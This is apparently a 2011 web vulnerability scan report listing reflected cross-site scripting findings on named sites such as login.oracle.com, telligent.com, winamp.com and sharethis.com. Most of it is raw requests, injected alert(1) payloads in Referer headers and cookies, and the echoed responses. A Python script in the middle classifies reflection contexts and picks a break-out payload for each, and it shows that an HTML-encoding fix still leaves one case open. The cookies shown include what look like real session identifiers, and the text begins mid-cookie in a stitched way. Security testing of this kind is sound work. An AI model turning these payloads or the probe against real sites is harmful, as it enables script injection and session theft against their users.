gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; 
s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Template file taken from conftest --> <!DOCTYPE HTML PUB ...[SNIP]... <a href="https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://www.google.com/search?hl=en&q=f3f59"><script>alert(1)</script>a68788fd6cd" class="boldbodylink"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c91e7"><script>alert(1)</script>8e874b658df was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~0C25F121~...[SNIP]... HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=c91e7"><script>alert(1)</script>8e874b658df Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; 
s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Template file taken from conftest --> <!DOCTYPE HTML PUB ...[SNIP]... <a href="https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://www.google.com/search?hl=en&q=c91e7"><script>alert(1)</script>8e874b658df" class="boldbodylink"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20662"><script>alert(1)</script>4f1a3620730 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/request_a_demo.aspx HTTP/1.1 Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; Referer: http://www.google.com/search?hl=en&q=20662"><script>alert(1)</script>4f1a3620730
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a57+GMT; expires=Sun, 26-Feb-2012 23:21:57 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:21:57 GMT Connection: close Content-Length: 66403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 137cc"><script>alert(1)</script>610a59d58cb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources/m/analysts/1343205.aspx HTTP/1.1 Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; Referer: http://www.google.com/search?hl=en&q=137cc"><script>alert(1)</script>610a59d58cb
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a27+GMT; expires=Sun, 26-Feb-2012 23:22:27 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:22:27 GMT Connection: close Content-Length: 64261
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc8d"><script>alert(1)</script>3a0b6097669 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources/m/analysts/1345217.aspx HTTP/1.1 Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; Referer: http://www.google.com/search?hl=en&q=bbc8d"><script>alert(1)</script>3a0b6097669
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a36+GMT; expires=Sun, 26-Feb-2012 23:22:36 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:22:36 GMT Connection: close Content-Length: 64972
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad044"><script>alert(1)</script>2b4dec818f3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources/m/success_stories/1331597.aspx HTTP/1.1 Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; Referer: http://www.google.com/search?hl=en&q=ad044"><script>alert(1)</script>2b4dec818f3
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a43+GMT; expires=Sun, 26-Feb-2012 23:22:43 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:22:43 GMT Connection: close Content-Length: 64200
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cdbf"><script>alert(1)</script>e4ccb6eed44 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /support/request_an_upgrade/ HTTP/1.1 Host: telligent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; Referer: http://www.google.com/search?hl=en&q=3cdbf"><script>alert(1)</script>e4ccb6eed44
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Telligent-Evolution: 5.5.134.11785 Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a35+GMT; expires=Sun, 26-Feb-2012 23:23:35 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:23:35 GMT Connection: close Content-Length: 61451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 169d7'-alert(1)-'05e31362016 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /en/ HTTP/1.1 Host: www.watchmouse.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=169d7'-alert(1)-'05e31362016
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 01:36:30 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-aae30c915a39ee69d50753ca20be732f" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 18320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::http://www.google.com/search?hl=en&q=169d7'-alert(1)-'05e31362016::en'); var serverRef = encodeURIComponent('http://www.google.com/search?hl=en&q=169d7'-alert(1)-'05e31362016'); if(document && document.referrer){ jsRef = encodeURIComponent(document.referre ...[SNIP]...
The value of the eyeblaster cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4de67%3balert(1)//33e2200b3e9 was submitted in the eyeblaster cookie. This input was echoed as 4de67;alert(1)//33e2200b3e9 in the application's response: the application URL-decodes the cookie value, so %3b becomes a semicolon that terminates the JavaScript statement, and // comments out whatever follows on that line.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability, for example an XSS or header-injection flaw on any host under the same registrable domain, since such a host can set a cookie whose Domain attribute covers the vulnerable one. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2240932&PluID=0&w=125&h=125&ord=773834383&ucm=true&ncu=$$http://at.atwola.com/adlink/5113/1838222/0/6/AdId=1468660;BnId=1;itime=773834383;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311144;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C4=; eyeblaster=BWVal=&BWDate=&debuglevel=4de67%3balert(1)//33e2200b3e9; A3=heSmakIJ0c9M00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8qaI0000000001tn; u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload c13e0<script>alert(1)</script>edfc50278cb was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php?fpc=30dea60-12e64e877f0-4b740973-1&purl=null&jsref= HTTP/1.1 Host: seg.sharethis.com Proxy-Connection: keep-alive Referer: http://edge.sharethis.com/share4x/index.5c108f5ecedf280ce5fe5e8db7e38332.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==c13e0<script>alert(1)</script>edfc50278cb
Response
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Sun, 27 Feb 2011 02:18:22 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM" Content-Length: 1195
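Every finding above follows one procedure: send a unique marker, locate it in the response, work out which syntactic context it landed in (a double-quoted attribute, an HTML comment, a quoted or unquoted JavaScript expression, text between tags), and then resend a payload carrying exactly the characters that context needs to break out of. The Python script below reproduces that procedure offline. It is an added example, not the scanner's code and not code from any site in this report; the response templates are constructed from the snippets quoted above (host.example is a placeholder host), and the second run shows why a blanket HTML-encoding fix still leaves the unquoted JavaScript case (the debuglevel reflection) exploitable.

```python
"""Reflection-context probe, modelled on the check the scan report describes.

Added example; not the scanner's code nor code from any site named in the
report. Flow: reflect a unique marker, find it in the response, classify the
syntactic context around it, pick the break-out string that context needs,
then confirm the payload comes back unmodified. Responses are rendered locally
from constructed templates, so nothing is sent over the network.
"""
import html
import secrets

# Constructed templates, one per reflection context quoted in the report.
# {v} marks where the untrusted parameter, header or cookie value lands.
TEMPLATES = {
    "attr":    '<a href="https://host.example/signup.do?cr={v}" class="link">x</a>',
    "comment": "<!-- fyi: your user-agent string is: {v} -->",
    "js_sq":   "<script>var ref = encodeURIComponent('http://host.example/?q={v}');</script>",
    "js_dq":   '<script type="text/javascript">Common.cntCode="US{v}";</script>',
    "js_bare": "<script>var debuglevel={v};</script>",
    "text":    "<div>segment: {v}</div>",
}

# Break-out string per context: the shapes of the payloads in the report.
BREAKOUT = {
    "attr_dq":       '"><script>alert(1)</script>',
    "attr_sq":       "'><script>alert(1)</script>",
    "attr_unquoted": "><script>alert(1)</script>",
    "html_comment":  "--><script>alert(1)</script>",
    "js_string_sq":  "'-alert(1)-'",
    "js_string_dq":  '"-alert(1)-"',
    "js_unquoted":   ";alert(1)//",
    "html_text":     "<script>alert(1)</script>",
}


def _quote_state(chunk, js=False):
    """Quote character still open at the end of chunk, or None.
    In JavaScript a backslash escapes the next character; in HTML it does not."""
    quote, i = None, 0
    while i < len(chunk):
        ch = chunk[i]
        if quote:
            if js and ch == "\\":
                i += 2
                continue
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        i += 1
    return quote


def classify_context(body, marker):
    """Name the context the marker lands in, judged from the text before it."""
    idx = body.find(marker)
    if idx < 0:
        return "not_reflected"
    before = body[:idx]
    low = before.lower()
    # Inside an unclosed <script>: JavaScript, quoted or not.
    s_open = low.rfind("<script")
    if s_open >= 0 and low.find("</script", s_open) < 0:
        js = before[before.find(">", s_open) + 1:]
        q = _quote_state(js, js=True)
        return {"'": "js_string_sq", '"': "js_string_dq"}.get(q, "js_unquoted")
    # Inside an unclosed <!-- comment.
    c_open = before.rfind("<!--")
    if c_open >= 0 and before.find("-->", c_open) < 0:
        return "html_comment"
    # Inside an unclosed tag: an attribute value, quoted or not.
    t_open = before.rfind("<")
    if t_open >= 0 and before.find(">", t_open) < 0:
        q = _quote_state(before[t_open:])
        return {"'": "attr_sq", '"': "attr_dq"}.get(q, "attr_unquoted")
    return "html_text"


def html_encode(value):
    """The one encoder many fixes reach for: entity-encodes & < > " '."""
    return html.escape(value, quote=True)


def render(template, value, encoder=None):
    """Stand-in for the target: inserts the value, through an encoder if given."""
    return template.replace("{v}", encoder(value) if encoder else value)


def probe(template, encoder=None):
    """Marker -> context -> targeted payload -> confirm unmodified reflection."""
    marker = secrets.token_hex(4)
    context = classify_context(render(template, marker, encoder), marker)
    if context == "not_reflected":
        return {"context": context, "payload": None, "vulnerable": False}
    payload = marker + BREAKOUT[context] + secrets.token_hex(4)
    body = render(template, payload, encoder)
    return {"context": context, "payload": payload, "vulnerable": payload in body}


def scan_all(encoder=None):
    """Probe every template; returns {name: probe result}."""
    return {name: probe(t, encoder) for name, t in TEMPLATES.items()}


if __name__ == "__main__":
    for enc in (None, html_encode):
        print("encoder:", enc.__name__ if enc else "none")
        for name, r in scan_all(enc).items():
            print(f"  {name:8} {r['context']:14} vulnerable={r['vulnerable']}")
```

Run without an encoder, every template reports vulnerable, with the same break-out strings the report shows. Run with html_encode, the attribute, comment, text and quoted-JavaScript cases stop reflecting the payload, but js_bare still does: ";alert(1)//" contains nothing an HTML encoder touches, which is why an unquoted JavaScript sink needs validation of the value's type rather than encoding.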
The value of the countryCookie cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef6c8"-alert(1)-"2de3f40c518 was submitted in the countryCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.winamp.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/login.php?do=login Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; countryCookie=USef6c8"-alert(1)-"2de3f40c518; s_pers=%20s_getnr%3D1298828698586-New%7C1361900698586%3B%20s_nrgvo%3DNew%7C1361900698588%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:45:15 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 71696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <script type="text/javascript">Common.cntCode="USef6c8"-alert(1)-"2de3f40c518";</script> ...[SNIP]...
